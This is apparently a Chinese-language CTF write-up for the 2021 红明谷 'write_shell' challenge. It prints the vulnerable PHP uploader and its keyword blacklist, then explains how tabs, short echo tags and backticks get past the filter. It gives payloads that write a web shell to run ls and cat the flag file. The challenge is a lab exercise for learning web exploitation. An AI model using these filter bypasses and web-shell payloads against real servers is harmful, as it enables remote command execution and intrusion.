[红明谷CTF 2021]write_shell

打开靶机,先上源码

<?php
// 禁止显示所有错误信息
error_reporting(0);

// 高亮显示当前文件的代码（用于调试）
highlight_file(__FILE__);

// check函数用于检查用户输入是否包含危险字符或关键词
function check($input){
    // 使用正则表达式检查是否包含危险字符或关键字
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // 如果包含危险字符，则终止执行，并显示"hacker!!!"的提示信息
        die('hacker!!!');
    }else{
        // 如果没有危险字符，则返回输入
        return $input;
    }
}

// waf函数用于对输入进行安全检查
function waf($input){
  // 如果输入是数组，则递归处理数组中的每一个元素
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);  // 递归调用waf函数
      }
  }else{
      // 如果输入不是数组，则对该输入进行check函数检查
      $input = check($input);
  }
}

// 定义目录路径：基于用户的IP地址创建一个唯一的目录
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';

// 如果目录不存在，则创建该目录
if(!file_exists($dir)){
    mkdir($dir);
}

// 根据传入的action参数执行不同的操作
switch($_GET["action"] ?? "") {
    case 'pwd':
        // 如果action参数为'pwd'，则返回当前目录路径
        echo $dir;
        break;
    case 'upload':
        // 如果action参数为'upload'，则获取data参数的内容
        $data = $_GET["data"] ?? "";
        
        // 调用waf函数进行输入检查
        waf($data);
        
        // 将处理后的数据写入到指定目录下的index.php文件中
        file_put_contents("$dir" . "index.php", $data);
}
?>

先用?action=pwd查看目录，记下访问该目录，访问该目录下index.php就是我们即将写入代码的目标文件
再讲讲写入，过滤的几个关键就是空格,php,; 一个一个来
空格过滤能用%09或\t来绕过，这两个符号都代表制表符，也就是平常使用的Tab键，四个空格
php主要针对php格式，换成<?= ?>就行了
至于;其实不用考虑 ?>会自动对最后一行起到;的作用
提一嘴php中 括起来的内容被认为是代码
构建payload:

?action=upload&data=<?=`ls\t/`?>`

在根目录里找到了flag,最终payload:

?action=upload&data=<?=`cat\t/flllllll1112222222lag`?>

flag{9f8b8390-ba06-4db5-a2b4-f5fbf71b6f0e}